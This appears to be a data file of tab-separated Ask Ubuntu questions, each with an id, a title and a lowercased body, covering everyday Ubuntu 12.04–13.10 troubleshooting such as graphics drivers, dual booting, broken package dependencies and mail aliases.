320249	photoshop not opening ( hardware or system error )	previously the photoshop is working on 12.04 ubuntu os but now the photoshop is saying unable to continue because of a hardware or system error . sorry , but this error is unrecoverable . i reinstall photoshop with no luck so how can i open photoshop again ?
320252	/usr/bin/ld : can not find -lpulse	can you help me to fix this issue . i try to compile qt application but i always get this error : /usr/bin/ld : can not find -lpulse i know i have to install some libs i just do n't know which one .
320254	vga controller is intel 's but graphic card is amd/ati , and 3d acceleration is not supported	i typed lspci -nn in the terminal . and this is what it says : 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 4 [ 8086:1e16 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm76 express chipset lpc controller [ 8086:1e59 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 display controller [ 0380 ] : advanced micro devices , inc. [ amd/ati ] mars [ radeon hd 8670a/8750m ] [ 1002:6600 ] 02:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6235 [ 8086:088e ] ( rev 24 ) 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) as you can see , vga controller is intel 's but display controller is amd/ati 's , and i have 'radeon graphics - amd ' sticker on my laptop . however , this document says like i should only check vga compatible controller , not display controller . another problem is that my 3d acceleration is not working . when i type fglrxinfo or /usr/lib/nux/unity_support_test -p , it says x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 22 current serial number in output stream : 22 this also occurs when i try to play 3d games , of course . however , as you can see , my graphic card is one of radeon hd 8xxx series ( a.k.a . oland ) . i think that 's why the ubuntu drivers did n't work . is there any unofficial drivers to make my 3d acceleration work ?
320259	how to setup gsm modem in qmi mode	my modem specification says it supports qmi mode . i did lsusb -vd 19d2 : fff1 it showed 3 endpoints for interface 1 . i ca n't find /dev/cdc-wdm0 to probe with qmicli . so how to setup my modem in qmi mode ?
320263	ca n't update my ubuntu phone with phablet-flash	i already have a ubuntu phone up and running on my nexus 4 . now i wanted to update it with `` phablet-flash '' which tells me : error : insufficient permissions for device error while executing adb shell getprop ro.cm.device make sure the device is connected and viewable by running 'adb devices' ensure you have a root device , one which running 'adb root ' does not return an error '' adb devices '' shows : list of devices attached ? ? ? ? ? ? ? ? ? ? ? ? no permissions i 'm using a different pc than i used for installation . how do i get access to the phone again so i can do an update ?
320266	how to use gnome in ubuntu 13.04	how do i use gnome in ubuntu 13.04 ? i tried the following from this site : sudo apt-get install gnome-session-fallback but it seems to be buggy , alt+tab does n't even work and when i 'm grabbing a particular window it grabs the one behind it instead . the gnome desktop feels faster on my machine and i find it easier to navigate with it , is there another way of using gnome in ubuntu 13.04 aside from the method above ? thanks in advance !
320272	ubuntu 12.04 64bits - can not install 32bits libs - dependy problem	sudo apt-get install ia32-libs -y gives the following message : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held packages ( hold ) spoiled . i need this libs to run the android adt .
320278	is mactel ppa good stuff for macbook pro 5,3 with ubuntu 13.04 ?	the mactel repository proposes some extra packages in order to run ubuntu on macbook computers . mine is a macbook pro 5,3 ( 2009 ) running ubuntu 13.04 . the wiki page about the mactel support seems to be quite old : https : //wiki.ubuntu.com/mactelsupportteam/ppa is it a good idea to add the ppa to my sources or are these packages already integrated to the 13.04 version of ubuntu ? i have some troubles with 13.04 on my mbp , essentially with the power management ( i must use acpi=off in grub2 or else i have random freezes ) .
320282	register computer in landscape	i have 10 `` remaining virtual machine registrations '' but i am not able to register any computer . neither a `` normal '' ubuntu instalaltion ( bare metal ) nor a lxc-container or a virtual box machine . the command i used : landscape-config -- computer-title `` my web server '' -- account-name worked without an error . but in landscape , when i try to accept the computer , i receive an error `` not enough liceneses available '' . what am i doing wrong ? thanks peter
320286	prevent pc from shutting down on power button	i am building a pc and a beaglebords arm embedded for public use . they run ubuntu 13.04 and manually assembled linux respectively . is there a way to prevent them from being shut down on pressing shutdown button ( on case , not on keyboard ) ? sure , i can do it in hardware . i just prefer software solutions . if somebody can say for sure `` this is impossible '' it would be a useful answer too . result : ok , i understood it . one can prevent shutdown on press , but not on long press . i will have to make hardware switch to plug off power button when needed .
320287	need to reinstall printer ( hp lasejet 1018 ) plugin everytime	i 'm using ubuntu 13.04 64-bit and hplip 3.13.6 . anytime i want to print something my printer does n't work . there are no error codes shown . when i reinstall the plugin problem is solved . must i do this always ? ( note : i did n't have the problem with ubuntu 12.xx )
320288	what is the linux-kernel-devel equivalent in 12.04.2 lts 3.5.0 ?	apologies for the noob question , but when i try to sudo apt-get install linux-kernel-devel i get the following : sudo apt-get install linux-kernel-devel reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-kernel-devel i have tried the following : sudo apt-get install linux-headers- $ ( uname -r ) sudo apt-get install build-essentials sudo apt-get install linux-headers-generic with no joy ... any suggestions ?
320292	bad color of backgroundcolor in a mainview when fixed to `` # f1e1a3 ''	i have a strange problem . when i fix the backgroundcolor in a mainview to `` # f1e1a3 '' it does n't show me the good color since when i draw a rectangle in the page with the same color , i see a difference ( see picture ) . when you fix both to `` black '' there are no difference . what am i doing wrong ? is a background color clearer than the color you ask ? or is it a bug ? the picture is drawn using the `` simple touch ui '' in qt creator . import qtquick 2.0 import ubuntu.components 0.1 mainview { backgroundcolor : `` # f1e1a3 '' width : units.gu ( 100 ) height : units.gu ( 75 ) page { title : i18n.tr ( `` simple '' ) column { spacing : units.gu ( 1 ) anchors { margins : units.gu ( 2 ) fill : parent } button { text : i18n.tr ( `` tap me ! '' ) color : `` # f1e1a3 '' } } } }
320296	which ubuntu version should i choose to learn unix/linux commands , the desktop or the server version ?	i am new to to ubuntu and i wan na learn unix/linux commands . for that which ubuntu version is better to install desktop or server ? can i install server within windows os ? or try by live cd mode ?
320299	installing nvidia geforce gtx 560 on ubuntu 13.04	i have a nvidia geforce gtx 560 graphic card with ubuntu 13.04 running kernel 3.8.0-19 ( tried with 3.10.0-999 , same issue ) and whenever i tried to install nvidia driver , either by downloading the *.run file from http : //www.nvidia.com and installing it as root ( during installation it give some errors as it failed to set runlevel ) , or doing those following steps : sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings whenever i reboot the system , all my screen is messed up ( with lower resoluition that should be , and with left and top bars missing ) , and worked hard to uninstall this driver and get my screen resolution and bars back . are there any secure and working way to install nvidia driver for that graphic card ?
320309	is a keyring necessary for programs to store passwords ?	i just downloaded ubuntu 13.04 earlier and was trying it out . at least i know you can surf all installed applications with the dash home if you click the icons at the bottom , you 're not forced to memorize all the names of everything . anyway ... i 'm used to windows , where programs have their own ways of storing passwords -- and they do , and i 've never had a hard time . it makes me comfortable . i 'm very *un*comfortable with the idea of something storing pretty much all my passwords , i prefer them to be separate entities . is a keyring really necessary for programs like chrome and firefox ? can i just disable the keyring altogether and still have chrome remember my passwords , or when i use ubuntu , will i forever have to type a password for it to automatically type a password ? to me , typing a password so i do n't have to type a password just does n't make any sense . i 'm confused . i never remember having to do this when i installed linux before . and yes , i have the login password the same as the keyring password but i still have to log into both each time .
320312	cronjob to store home-ip	i 'm working out a cronjob to store my current ip ( home-server ) on my external vps server in a database . i can now use the ip to connect to my home server without using dyndns . ( ok , probably you think why not just use dyndns , cause i do n't feel safe about someone having my ip in his database every time it changes . ) is there any possible way to execute a php file periodically that is on my vps server to determinate my current ip at home and then store it in a db ? thx in advance !
320319	installed ubuntu 12.04 but only terminal shows and there is no option to start windows 7	when i start my laptop it shows a menu `` gnu grub version 1.99-21ubuntu3.9 '' with options ubuntu , with linux 3.5.0-23-generic , ubuntu , with linux 3.5.0-23-generic ( recovery mode ) , memory test ( memtest86+ ) , memory test ( memtest86+ , serial console 115200 ) , if i start ubuntu , i 'm shown a terminal with ubuntu 12.04.02 lts ubuntu ttyl ubuntu login : i have no idea how to fix this .
320325	installing windows again ...	so here 's my story . i had windows vista on my laptop , but as we all know , vista is terrible . so i installed ubuntu ( and let the wubi installer delete windows completely ) . now , after all this time , i 'd like to have windows xp back on my laptop . the problem is : my dvd drive is broken , so i have to use a usb boot . but then comes a new problem . every time i try to run the usb boot , i get this error : bootmgr is missing . a friend told me it 's because i let ubuntu take over the entire laptop , and because of that , my hdd is not in the right format for me to install windows again.. any ideas on how i could solve this ? : /
320329	problem installing an older version of gcc	problem installing an older version of gcc hi , i 'm new to ubuntu : ) i 'm trying to compile a program in matlab using mex ( matlab ) , but i 'm getting an error that i 'm using gcc version 4.6.3 and the currently supported version with mex is 4.4.x . so i downloaded gcc 4.4.3 , but when i try to open it using ubuntu software center , i 'm getting an error : dependency is not satisfiable : gcc-4.4-base ( =4.4.3-4ubuntu5.1 ) . i do n't know how to solve this problem . can anyone please help ? any help will be greatly appreciated as i 'm quite stuck . thanks in advance , gil .
320331	how to install google drive ?	how to install google drive in ubuntu 13.04 ? i am trying to find out an installation file from internet ( by using google search ) . but , am not able to find out such installer .
320334	how do i install the unity desktop environment on ubuntu studio 13.04 ( xfce ) ?	i am a bit of a newbie . i 'd like to have the option of booting into either unity of xfce in ubuntu studio . any help is appreciated .
320337	is there any possibility of data loss when dual booting ubuntu 13.04 and windows 7 ?	i am already using windows 7 . i want to install ubuntu 13.04 along side windows 7 in a partition that i already made in one of my hard drive but i am worried about losing the data on my drive . is there any possibility of data loss ?
320339	recover data from lost partition	i got the glibc not found error while trying to upgrade from kubuntu 12.10 to kubuntu 13.04 . so i created a livecd and by accident started installation . before i knew it , it deleted the partitions . i am now trying to recover data so that i can install a fresh copy of 13.04 . for some reason i can not recreate the partitions using the ubuntu data recovery page . i have tried testdisk and gparted but neither one did anything . i do n't even know if the data is still there . ubuntu guides says the following ; so long as you have not written data in that space , all your data is still there . i am not sure if no data has been written to that space , i mean i pressed cancel on the installation screen as soon as i can but i do n't know what all it did other than deleting the partitions . what are my options , how can i proceed further ?
320345	need help getting wireless drivers to work	ok i 'm totally new to this , i have ubuntu installed , my wireless is not working , and i even found the drivers . so where is the install file ? there are no exe files , and i had to do a whole lot of searching to be told that i must somehow input this information in myself using control+alt+t on some command line . nothing in this operating system explained this to me . ok so i can bring up this weird comand line , i do n't even know where the file is located or where it is i am supposed to be sending it to , or just exactly what it is that i the new user am supposed to be typing to magically get it there . what do i need to know to get my computer connect to wifi ?
320347	how to install windows 7 from dvd ?	i installed ubuntu 12.04 in my laptop . now i want to remove ubuntu and i install windows 7 . but when i restart my system after keeping windows 7 dvd it is not booting . what should i do to get rid of this problem ? i have tried to modify many options , but none of them had worked out ?
320348	postfix alias setting seemingly ignored	with postfix on a ubuntu server ( 12.04 ) , email that should be sent to root ends up being sent to nobody . why ? and how can i make sure it gets directed to an actual account ? my /etc/aliases file looks like this : # mail aliases for sendmail # # you must run newaliases ( 1 ) after making changes to this file . # # required aliases postmaster : root mailer-daemon : postmaster # common aliases abuse : postmaster spam : postmaster # other aliases admin : drsar to me this means that mail to postmaster ( non-existent user ) should be directed to root . that is not where it arrives though . i can see mail arriving in /var/spool/mail/nobody . i checked and there is no /root/.forward file . so the mail is also not manually redirected to nobody ( or some other unknown username ) . what other settings affect the re-direction of mail ? some diagnostic info : root @ server : ~ # postconf -n alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix inet_interfaces = all mailbox_command = procmail -a `` $ extension '' mailbox_size_limit = 0 mydestination = $ myhostname , localhost.localdomain , localhost.localdomain , localhost , $ mydomain mydomain = fqdn.server.com myhostname = fqdn.server.com mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = $ mydomain readme_directory = no recipient_delimiter = + relayhost = smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes and some log output for a message that was sent to root @ localhost jul 15 10:16:23 localhost postfix/smtpd [ 26006 ] : connect from localhost [ 127.0.0.1 ] jul 15 10:16:23 localhost postfix/smtpd [ 26006 ] : ae3ad3920547 : client=localhost [ 127.0.0.1 ] jul 15 10:16:24 localhost postfix/smtpd [ 26006 ] : disconnect from localhost [ 127.0.0.1 ] jul 15 10:16:24 localhost postfix/pickup [ 20987 ] : 367a73900028 : uid=1000 from= < drsar @ localhost.localdomain > jul 15 10:16:24 localhost postfix/cleanup [ 26008 ] : 367a73900028 : message-id= < alpine.deb.2.02.1307151016060.25996 @ localhost.localdomain > jul 15 10:16:24 localhost postfix/qmgr [ 20988 ] : 367a73900028 : from= < drsar @ localhost.localdomain > , size=676 , nrcpt=1 ( queue active ) jul 15 10:16:24 localhost postfix/local [ 26011 ] : 367a73900028 : to= < root @ localhost.localdomain > , relay=local , delay=0.97 , delays=0.86/0/0/0.11 , dsn=2.0.0 , status=sent ( delivered to command : procmail -a `` $ extension '' ) jul 15 10:16:24 localhost postfix/qmgr [ 20988 ] : 367a73900028 : removed
320354	aspect ratio is locked at 4:3 ?	i just installed ubuntu on a fairly new laptop , and everything worked fine at first . however , after i installed a proprietary driver for the cpu and reset the system , the aspect ratio was automatically changed to 4:3 , and it does n't give me an option to change it back to 16:9 . is there some additional driver for the gpu i need to download ? s880m [ mobility radeon hd 4200 series ] [ 1002:9712 ] subsystem : toshiba america info systems device [ 1179 : fddo ] kernel driver in use : fglrx_pci kernel modules : fglrx , radeon
320360	ca n't boot windows 7 after ubuntu 12.04 lts installation	i installed ubuntu , but the installation was primitive and probably the wrong edition . it was suggested it may have been the server edition . when i tried to re-install the proper edition , the installer did not detect windows 7 on my disk . ubuntu is now installed on a separate partition . the ntfs partition is still intact and my windows os is visible as a device within the media folder of my ubuntu file system . http : //www.scribd.com/doc/154418809/results-of-boot-info-script
320362	i 'm new to ubuntu , and i 'd like to know how the firefox browser really works . strange , after windows system ( s ) ... .	browsing with firefox from the ubuntu is very strange , especially the search bar . is it the only option , or i can create something different ?
320367	unable to connect galaxy nexus to ubuntu 12.04 through gmtp	when i launch gmtp for browsing the files in galaxy nexus i get the following error message : failed to get storage parameters from the device - need to disconnect . i have already tried the answers given in the following question : getting mtp to work with a galaxy nexus ?
320368	volume control either mute or max - no inbetween	i have recently installed ubuntu and am having trouble with my soundcard . it is an external usb card ( the laptop also has an inbuilt intel one which i am not using ) . the problem is that when i change the volume any value below 100 % the sound immediately mutes . i can only hear sound if the volume control is a 100 % . i can change the volume level within applications , but not system wide . in alsa-mixer i can change the volume fine , but as soon as i reduce the volume using hotkeys or through the system settings it goes mute . i assume it is a driver issue as lsusb shows my device as : bus 002 device 003 : id 0d8c:0006 c-media electronics , inc. storm hp-usb500 5.1 headset though it is an external soundcard , not a headset . any help much appreciated .
320369	ca n't get back into windows 8 from ubuntu 13.10	i had windows 8 on my laptop and dual booted ubuntu 13.10 on it using a flashdrive . something happened with my windows 8 loader and it does n't work anymore . it shows up on the grub menu , along with the restorer but neither work . if i select the windows 8 loader , the screen flashes black and goes right back into the grub menu . if i select the restorer , loads up a background picture with a working cursor ( it 's not frozen ) , but i ca n't do anything from there . my friend suggested using easybcd , but i 'm not sure how , as i 'm `` stuck '' in this ubuntu environment that i 'm very unfamiliar with . thanks in advance for reading ! any help is appreciated !
320371	confused over which method to use to install ?	i 'm a little confused over which way to install ubuntu 12 . i 've been running it in a virtual machine for a while now and i want to make the switch from windows . i 'd like to have a dual boot , with a large portion of disk space given over to ubuntu so i can wean myself off windows . there seem to be so many ways to install it that i 'm getting a bit lost . a link to the correct page would be much appreciated .
320379	touchscreen worked on `` try without install '' and now does not	so recently , i bought a lenovo ideapad z400 , which has a wonderful 10-point multi-touch screen . i absolutely hate windows 8 , so i decided to try to dual boot ubuntu . i did the installation after the trial worked perfectly with the touchscreen . but ever since , the touch screen is not recognized by ubuntu-or so it seems . ( it still works on windows 8 . ) i honestly have no idea what i 'm doing , as this is my first time ever using any linux os , as well as a touchscreen laptop . anyone able to help or have any thoughts on this ?
320390	thunderbird does not load profile	i 'm having a serious problem with thunderbird . recently i started the program , but it did not load my profile . he opened asking to configure the e-mail as if it were the first time i was using the program . i checked the folder . thunderbird and the file `` profile '' the key `` path '' is set correctly for the profile file `` exemplo.default '' . does anyone know how to fix it . otherwise , i 'll lose all my important messages forever .
320391	why wo n't my script work ?	umm my script is n't working and i do n't know why , it gives me the error '' update1.run : line 187 : syntax error : unexpected end of file '' here 's my code http : //pastebin.com/4w4awuy5 i would really appreciate any help you can give , thanks !
320405	optirun uses nvidia , primusrun uses intel card	i want to run games on ubuntu with steam . i installed bumblebee and primus and the default nvidia driver ( 304 ) . i 've read that the 310 driver gives a huge performance boost so i wanted to try that . i installed the nvidia-experimental-310 & nvidia-settings-310 and configured bumblebee.conf on the bottom he points out that i have to edit /usr/bin/primusrun to use nvidia-experimental-310 # ! /bin/bash # readback-display synchronization method # 0 : no sync , 1 : d lags behind one frame , 2 : fully synced # export primus_sync= $ { primus_sync : -0 } # verbosity level # 0 : only errors , 1 : warnings ( default ) , 2 : profiling export primus_verbose= $ { primus_verbose : -2 } # secondary display # export primus_display= $ { primus_display : -:8 } # `` accelerating '' libgl # $ lib will be interpreted by the dynamic linker export primus_libgla= $ { primus_libgla : -'/usr/lib/nvidia-310-updates/libgl.so.1 : /usr/lib32/nvidia-310-updates/libgl.so.1 ' } # `` displaying '' libgl # export primus_libgld= $ { primus_libgld : -'/usr/lib/ $ lib/mesa/libgl.so.1 ' } # directory containing primus libgl primus_libgl= $ { primus_libgl : -/usr/lib/ ' $ lib'/primus } # on some distributions , e.g . on gentoo , libnvidia-tls.so is not available # in default search paths . add its path manually after the primus library case $ primus_libgla in /usr/lib*/nvidia-310-updates*| '' ) # nvidia is used by default primus_libgl= $ { primus_libgl } : $ { primus_libgla///libgl.so.1 } ; ; esac # mesa drivers need a few symbols to be visible # export primus_load_global= $ { primus_load_global : -'libglapi.so.0 ' } # need functions from primus libgl to take precedence export ld_library_path= $ { primus_libgl } $ { ld_library_path : + : $ ld_library_path } # and go ! exec `` $ @ '' my system lenovo ideapad y580 ubuntu 13.04 intel core i7 nvidia gtx660m when i run optirun glxspheres i get this output : polygons in scene : 62464 visual id of window : 0x20 context is direct opengl renderer : geforce gtx 660m/pcie/sse2 150.527939 frames/sec - 167.989179 mpixels/sec when i run vblank_mode=0 optirun -b primus glxspheres i get 292.591142 frames/sec - 326.531714 mpixels/sec with my nvdia however when i run primusrun glxspheres i get polygons in scene : 62464 visual id of window : 0x20 xlib : extension `` nv-glx '' missing on display `` :0 '' . context is indirect opengl renderer : mesa dri intel ( r ) ivybridge mobile 63.910723 frames/sec - 71.324367 mpixels/sec i also tried to set vblank_mode=0 optirun -b primus % command % in the steam which does n't open any game ( tf2 & trine 2 ) . the article says i should update the primusrun to use nvidia-experimental-310 but i replaced it with nvidia-310-updates because those are the folders which exist .
320410	will apt-get dist-upgrade blow away my postgresql server setup ?	i 'm about to upgrade my webserver , my site relies heavily on postgresql database and settings . i started apt-get dist-upgrade , and it says it wants to upgrade postgres . i cancelled , but will it wipe out my database and settings ? i know , `` backup '' and i have , but i still prefer not to set it up again if i can avoid it .
320412	how to reset external display ?	so i was testing my laptop on my external scree and managed to cycle through the modes until i hit the one which displayed only on the external monitor . this just output a green screen and nothing else . now , whenever i connect the laptop i ca n't use the fn+f3 button to swap between screen modes . it appears that it 's stuck on this output . also to make things worse , the laptop seems to remember the setting , so now whenever i plugin the display all i ever get is a green screen . i 've tried rebooting the laptop , but i think the only way now is to reset the laptop somehow so it does n't know that it 's been connected to the external screen and i can use 'span ' or 'mirror ' mode instead of 'external only ' mode , which clearly does n't work . update i 've tried swapping to terminal using ctrl+alt+f1 but the external display goes to sleep . i 've tried using microdisplayport - > hdmi - > dvi to the monitor with the same outcome . it works fine on my tv using hdmi , but i have n't tried cycling the modes . i got it working on the tv , and then moved the laptop to the monitor hoping it would work , but i had the same outcome . i believe there is a setting somewhere in the system which is remembering the last used configuration for the specific monitor , and i would like to reset that , so that i can at least use my screen in span mode .
320414	after catalyst install system freezes on booting , problem with mouse pointer	system : samsung 535u4c apu a6-4455 integrated radeon hd 7500 dedicated hd7550 ( hybrid graphics ) linux mint nadia based on ubuntu 12.10 quantal quetzal after installing the catalyst driver 13.4 my notebook freezes randomly ( not always ) during booting . furthermore when linux started without freeze the mouse pointer when moving to the rightmost , gets out of the right site of the screen and appears then on the left side . i 've tried different catalyst version ( 12.10 , 13.4 , 13.6 beta ) and the problem always persisted . i guess that the dedicated hd 7550 is not correctly detected . but i do not know how to solve it . i 'm a newbie to linux and i would be very grateful for any proposal to resolve the problem . thanks in advance . this is my fglrxinfo output : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7500g opengl version string : 4.2.12217 compatibility profile context 12.104 display : :0 screen : 1 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7500m/7600m series opengl version string : 4.2.12217 compatibility profile context 12.104 this is part my dmesg output : [ 24.362205 ] vgaarb : this pci device is not a vga device [ 126.153095 ] [ fglrx : firegl_apl_loaddatabase ] error apl : apl initialize fail . lspci -nn | grep vga output : 00:01.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati device [ 1002:990a ] 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati thames [ radeon 7500m/7600m series ] [ 1002:6841 ]
320416	how to start a gui application from the terminal and return immediately ?	for example , if i type gimp in my terminal , gimp will launch , but it will wait for gimp to be closed before returning control to the terminal . if i press ctrlc it will close gimp . how do i prevent this ?
320418	get rid of insync	i 'm new here , so i 'm not totally sure if this question would be appropriate for these forums , but anyways ... how can i uninstall insync from my computer . i did n't like the service and so , i disconnected it from my google account . but , i ca n't get it off my computer . i do use ubuntu as my only os , and i have a 64 bit computer . also , if i disconnect insync from my google account , will it still send me emails ? i 'm just wondering . please reply !
320425	installed xubuntu from usb stick now only boots up if usb stick is inserted	quite new to xubuntu but here goes.. i 've got hp microserver that i am trying to install xubuntu onto . no dual boot , will be xubuntu only . so i downloaded the ubuntu iso and made up a bootable usb stick using lili usb creator . it booted up with the usb stick , and i selected to install xubuntu . the install seemed to go well , i selected the hard drive that i wanted to install it to , ex4 partition and a swap partition and selected this same drive as the boot drive . install finished and all seemed to be working well , was in the gui etc . so i powered down and removed the usb stick . booted up again and got to a black screen with a flashing cursor up in the top left corner and it did n't go past this point . did n't see any grub menu either prior to this point - not sure if i should as it 's not dual boot ? so turned off again , put usb stick back in . it booted off the usb stick and asked if i wanted to install or try ubuntu . i canceled this window ( did n't select either option ) and then it actually continued on and booted up i assume using the install on the hard drive . so it seems it ca n't boot up without the usb stick.. like it has n't created the bootloader or grub or something properly ? any ideas ? thanks update posted as answer so i tried boot repair.. did n't help . here is the log . i am trying to run ubuntu off sdc . http : //paste.ubuntu.com/5880582/ i tried reinstalling again being really careful with partitions to ensure i selected sdc . but same problem just flashing cursor after reboot . pressing shift does nothing when trying to boot from hard drive only if usb stick is in does it take me to grub menu .
320426	screwed everything up after installing wine	note : i 'm an ubuntu noob when i try to install anything , say filezilla ... i get this : i type sudo apt-get install filezilla type in my password i get : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . filezilla : depends : libtinyxml2.6.2 but it is not going to be installed depends : libwxbase2.8-0 ( > = 2.8.12.1 ) but it is not going to be installed depends : libwxgtk2.8-0 ( > = 2.8.12.1 ) but it is not going to be installed depends : filezilla-common ( = 3.5.3-1ubuntu2 ) but it is not going to be installed wine1.6 : depends : wine1.6-amd64 ( = 1.6~rc2-0ubuntu1~ppa4 ) but 1.6~rc2-0ubuntu1~ppa1 is to be installed depends : wine1.6-i386 ( = 1.6~rc2-0ubuntu1~ppa4 ) wine1.6-amd64 : depends : wine1.6 : any ( = 1.6~rc2-0ubuntu1~ppa1 ) wine1.6-i386 : i386 : depends : wine1.6 : any : i386 ( = 1.6~rc2-0ubuntu1~ppa1 ) e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . caitlan @ caitlan-imac : ~ $ so i try sudo apt-get -f install : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libdrm-nouveau2 libxrandr-ltsq2 libllvm3.1 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : wine1.6 wine1.6-amd64 wine1.6-i386 : i386 suggested packages : dosbox : any the following packages will be upgraded : wine1.6 wine1.6-amd64 wine1.6-i386 : i386 3 upgraded , 0 newly installed , 0 to remove and 272 not upgraded . 4 not fully installed or removed . need to get 50.7 mb of archives . after this operation , 1,162 kb of additional disk space will be used . do you want to continue [ y/n ] ? ^ccaitlan @ caitlan-imac : ~ $ i type in y get:1 http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ precise/main wine1.6-amd64 amd64 1.6~rc4-0ubuntu1 [ 24.9 mb ] get:2 http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ precise/main wine1.6 amd64 1.6~rc4-0ubuntu1 [ 1,177 kb ] get:3 http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ precise/main wine1.6-i386 i386 1.6~rc4-0ubuntu1 [ 24.6 mb ] fetched 50.7 mb in 48s ( 1,044 kb/s ) dpkg : dependency problems prevent configuration of wine1.6-amd64 : wine1.6-amd64 depends on wine1.6 : any ( = 1.6~rc2-0ubuntu1~ppa1 ) ; however : version of wine1.6 on system is 1.6~rc2-0ubuntu1~ppa4 . dpkg : error processing wine1.6-amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.6 : wine1.6 depends on wine1.6-amd64 ( = 1.6~rc2-0ubuntu1~ppa4 ) ; however : version of wine1.6-amd64 on system is 1.6~rc2-0ubuntu1~ppa1 . wine1.6 depends on wine1.6-i386 ( = 1.6~rc2-0ubuntu1~ppa4 ) ; however : package wine1.6-i386 is not installed . version of wine1.6-i386 : i386 on system is 1.6~rc2-0ubuntu1~ppa1 . dpkg : error processing wine1.6 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.6-i386 : i386 : wine1.6-i386 : i386 depends on wine1.6 : any ( = 1.6~rc2-0ubuntu1~ppa1 ) ; however : version of wine1.6 on system is 1.6~rc2-0ubuntu1~ppa4 . dpkg : error processing wine1.6-i386 : i386 ( -- configno apport report written because the error message indicates it 's a follow-up error from a previous failure . no apport report written because the error message indicates it 's a follow-up error from a previous failure . no apport report written because the error message indicates it 's a follow-up error from a previous failure . ure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine : wine depends on wine1.6 ; however : package wine1.6 is not configured yet . dpkg : error processing wine ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : wine1.6-amd64 wine1.6 wine1.6-i386 : i386 wine e : sub-process /usr/bin/dpkg returned an error code ( 1 ) caitlan @ caitlan-imac : ~ $ if i go on software centre , i get : items can not be installed or removed until the package catalogue is repaired help ?
320427	lamp stack installation . accidental deletion of ports.conf	i have ubuntu 12.04 and tried to install apache/php/mysql with the default lamp stack using tasksel . everything went well until i was going to edit the /etc/apache2/ports.conf file according to the apachemysqlphp guide . i unintentionally deleted the contents of the document because i had not first changed the file 's permissions . now , i can not figure out how to restore the file to its original state . i tried reinstalling the programs , but it had no effect , as apache is still installed and running .
